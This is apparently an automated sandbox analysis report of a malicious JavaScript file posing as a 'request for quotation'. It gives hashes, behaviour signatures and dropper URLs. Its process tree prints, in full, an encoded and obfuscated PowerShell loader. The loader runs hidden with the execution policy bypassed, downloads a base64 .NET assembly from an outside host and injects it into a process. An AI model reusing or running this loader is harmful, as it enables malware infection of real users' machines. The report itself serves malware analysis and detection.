Overview

overview

10

Static

static

1

REQUEST F...ION.js

windows7-x64

10

REQUEST F...ION.js

windows10-2004-x64

10

Analysis

  • max time kernel
    120s
  • max time network
    121s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    26-09-2024 13:25

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    REQUEST FOR QUOTATION.js

  • Size

    318KB

  • MD5

    08dab38ef2c8bdada3b4928145b777f7

  • SHA1

    8d9fe403c417c9fc50ed09528dd2b096ebfe6375

  • SHA256

    cfea01473114d986467817f9c5e0713e84ef8d6fa8a44509780d390fc6b09b41

  • SHA512

    52aeb79f20660946bb7095addb26de8f115d29c4b15cd8169418d73db102c4ca7f79096780baa896357efe40999957969631b718557fd7c35e7375a2288ea5d5

  • SSDEEP

    6144:ae3G0HrhDz6LXUo09qGOWIC5pbyo68vh146TIVdDfo+IitZsVAsuG7EEqZ1Cr81b:Zr81VpOhEUX7dyIUwRjsSXKs0AUUbPMz

Score
10/10
execution

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://ia904601.us.archive.org/6/items/detah-note-j/DetahNoteJ.txt
exe.dropper

https://ia904601.us.archive.org/6/items/detah-note-j/DetahNoteJ.txt

Signatures

  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

    execution
  • Command and Scripting Interpreter: JavaScript 1 TTPs
    execution
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe "C:\Users\Admin\AppData\Local\Temp\REQUEST FOR QUOTATION.js"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2532
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LgAoACAAKABbAHMAVABSAGkATgBHAF0AJABWAEUAUgBiAE8AcwBFAHAAUgBFAGYAZQBSAEUATgBDAEUAKQBbADEALAAzAF0AKwAnAFgAJwAtAEoAbwBpAG4AJwAnACkAKAAgACgAJwBGACcAKwAnADAANAAnACsAJwB1AHIAbAAgACcAKwAnAD0AIABuAEsAcgAnACsAJwBoAHQAJwArACcAdABwACcAKwAnAHMAJwArACcAOgAvAC8AaQBhADkAMAA0ADYAMAAxAC4AdQBzAC4AYQAnACsAJwByAGMAJwArACcAaABpAHYAZQAuAG8AJwArACcAcgBnAC8ANgAvACcAKwAnAGkAdABlAG0AcwAvAGQAZQAnACsAJwB0AGEAaAAtAG4AbwB0AGUALQBqAC8ARABlACcAKwAnAHQAYQBoAE4AJwArACcAbwAnACsAJwB0AGUASgAuAHQAeAB0ACcAKwAnAG4ASwByADsARgAwADQAYgBhAHMAZQA2ACcAKwAnADQAQwBvAG4AdABlAG4AJwArACcAdAAgAD0AJwArACcAIAAoAE4AZQB3AC0ATwBiACcAKwAnAGoAZQBjAHQAIAAnACsAJwBTAHkAcwAnACsAJwB0AGUAbQAnACsAJwAuACcAKwAnAE4AZQB0AC4AJwArACcAVwBlAGIAQwBsAGkAZQBuACcAKwAnAHQAJwArACcAKQAuACcAKwAnAEQAbwAnACsAJwB3AG4AbABvAGEAZAAnACsAJwBTAHQAcgBpAG4AJwArACcAZwAnACsAJwAoAEYAMAA0AHUAcgBsACcAKwAnACkAJwArACcAOwBGACcAKwAnADAANABiAGkAbgBhAHIAeQBDACcAKwAnAG8AbgB0AGUAbgAnACsAJwB0ACAAPQAgAFsAUwB5ACcAKwAnAHMAdABlACcAKwAnAG0ALgBDAG8AJwArACcAbgB2AGUAcgB0AF0AOgA6ACcAKwAnAEYAcgBvACcAKwAnAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAnACsAJwBGADAANABiAGEAcwBlADYANABDAG8AbgB0AGUAbgB0ACkAJwArACcAOwBGADAANABhAHMAJwArACcAcwBlAG0AYgBsACcAKwAnAHkAJwArACcAIAA9ACAAWwBSAGUAZgBsACcAKwAnAGUAJwArACcAYwB0AGkAbwBuAC4AQQAnACsAJwBzAHMAZQBtAGIAJwArACcAbAB5AF0AJwArACcAOgA6ACcAKwAnAEwAbwBhAGQAKABGADAANABiAGkAbgAnACsAJwBhACcAKwAnAHIAeQAnACsAJwBDAG8AbgB0AGUAJwArACcAbgB0ACkAOwBGADAAJwArACcANAB0AHkAcABlACAAPQAgAEYAMAA0AGEAcwAnACsAJwBzAGUAbQBiAGwAeQAnACsAJwAuACcAKwAnAEcAZQB0ACcAKwAnAFQAJwArACcAeQBwAGUAKABuAEsAJwArACcAcgBSACcAKwAnAHUAbgBQAEUALgBIACcAKwAnAG8AbQBlACcAKwAnAG4AJwArACcASwByACcAKwAnACkAOwBGADAANABtACcAKwAnAGUAdABoAG8AZAAgAD0AIABGADAANAB0AHkAcABlAC4ARwBlACcAKwAnAHQATQBlAHQAaABvAGQAKABuAEsAcgAnACsAJwBWAEEASQBuAEsAcgApADsAJwArACcARgAwADQAbQBlAHQAaAAnACsAJwBvAGQALgBJAG4AdgBvAGsAZQAnACsAJwAoAEYAMAA0ACcAKwAnAG4AJwArACcAdQBsAGwALAAgACcAKwAnAFsAbwBiAGoAZQBjAHQAWwBdACcAKwAnAF0AQAAnACsAJwAoAG4ASwByAHQAeAB0ACcAKwAnAC4AYQBmAGkAJwArACcAbgBlAGoALwB2ACcAKwAnAGUAZAAnACsAJwAuACcAKwAnADIAcgAuACcAKwAnADMAOQBiADMANAA1ADMAMAAyAGEAMAA3ACcAKwAnADUAYgAxAGIAYwAwACcAKwAnAGQANAA1AGIANgAnACsAJwAzACcAKwAnADIAZQBiADkAJwArACcAZQBlADYAMgAtAGIAdQBwAC8AJwArACcALwA6ACcAKwAnAHMAcAB0AHQAJwArACcAaABuAEsAJwArACcAcgAgACwAIABuAEsAcgBkAGUAcwBhACcAKwAnAHQAaQB2AGEAZABvAG4ASwByACcAKwAnACAALAAnACsAJwAgAG4ASwByAGQAZQBzAGEAdABpAHYAYQBkAG8AbgBLACcAKwAnAHIAIAAsACcAKwAnACAAbgBLAHIAJwArACcAZAAnACsAJwBlAHMAYQB0ACcAKwAnAGkAdgAnACsAJwBhAGQAbwAnACsAJwBuAEsAcgAsAG4ASwByAEEAZABkACcAKwAnAEkAJwArACcAbgBQAHIAbwBjAGUAcwBzADMAMgBuAEsAcgAsAG4AJwArACcASwByAGQAZQBzAGEAJwArACcAdABpAHYAYQBkAG8AbgBLAHIAJwArACcAKQApADsAJwApAC4AUgBFAHAATABBAGMAZQAoACcARgAwADQAJwAsACcAJAAnACkALgBSAEUAcABMAEEAYwBlACgAJwBuAEsAcgAnACwAWwBzAHQAcgBpAE4ARwBdAFsAQwBIAEEAUgBdADMAOQApACkA';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($Codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2344
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( ([sTRiNG]$VERbOsEpREfeRENCE)[1,3]+'X'-Join'')( ('F'+'04'+'url '+'= nKr'+'ht'+'tp'+'s'+'://ia904601.us.a'+'rc'+'hive.o'+'rg/6/'+'items/de'+'tah-note-j/De'+'tahN'+'o'+'teJ.txt'+'nKr;F04base6'+'4Conten'+'t ='+' (New-Ob'+'ject '+'Sys'+'tem'+'.'+'Net.'+'WebClien'+'t'+').'+'Do'+'wnload'+'Strin'+'g'+'(F04url'+')'+';F'+'04binaryC'+'onten'+'t = [Sy'+'ste'+'m.Co'+'nvert]::'+'Fro'+'mBase64String('+'F04base64Content)'+';F04as'+'sembl'+'y'+' = [Refl'+'e'+'ction.A'+'ssemb'+'ly]'+'::'+'Load(F04bin'+'a'+'ry'+'Conte'+'nt);F0'+'4type = F04as'+'sembly'+'.'+'Get'+'T'+'ype(nK'+'rR'+'unPE.H'+'ome'+'n'+'Kr'+');F04m'+'ethod = F04type.Ge'+'tMethod(nKr'+'VAInKr);'+'F04meth'+'od.Invoke'+'(F04'+'n'+'ull, '+'[object[]'+']@'+'(nKrtxt'+'.afi'+'nej/v'+'ed'+'.'+'2r.'+'39b345302a07'+'5b1bc0'+'d45b6'+'3'+'2eb9'+'ee62-bup/'+'/:'+'sptt'+'hnK'+'r , nKrdesa'+'tivadonKr'+' ,'+' nKrdesativadonK'+'r ,'+' nKr'+'d'+'esat'+'iv'+'ado'+'nKr,nKrAdd'+'I'+'nProcess32nKr,n'+'Krdesa'+'tivadonKr'+'));').REpLAce('F04','$').REpLAce('nKr',[striNG][CHAR]39))"
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2664

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\YA3U86Z9EWPO5EYAHIC8.temp
    Filesize

    7KB

    MD5

    7614c5bae9bac6b15af708d9cfa8bf37

    SHA1

    10fc114ffeba420f34c6d35e258a3ece7dc81b39

    SHA256

    70704120caa468ddb6ff42eb01486dd1549dc41a54500e596c8b3bc7161e9547

    SHA512

    0160c371241dcb830cdddd5429d16e34478da1b07aa226ad831afaf07e9df67957aecb4e3887581755aa73301bd117240476cbf13ad9ac972314e5888c66a9d5

    Download Submit

  • memory/2344-4-0x000007FEF61CE000-0x000007FEF61CF000-memory.dmp

    Filesize

    4KB

    Download

  • memory/2344-5-0x000000001B6B0000-0x000000001B992000-memory.dmp

    Filesize

    2.9MB

    Download

  • memory/2344-8-0x000007FEF5F10000-0x000007FEF68AD000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2344-9-0x000007FEF5F10000-0x000007FEF68AD000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2344-10-0x000007FEF5F10000-0x000007FEF68AD000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2344-7-0x000007FEF5F10000-0x000007FEF68AD000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2344-6-0x0000000001E10000-0x0000000001E18000-memory.dmp

    Filesize

    32KB

    Download

  • memory/2344-11-0x000007FEF5F10000-0x000007FEF68AD000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2344-17-0x000007FEF5F10000-0x000007FEF68AD000-memory.dmp

    Filesize

    9.6MB

    Download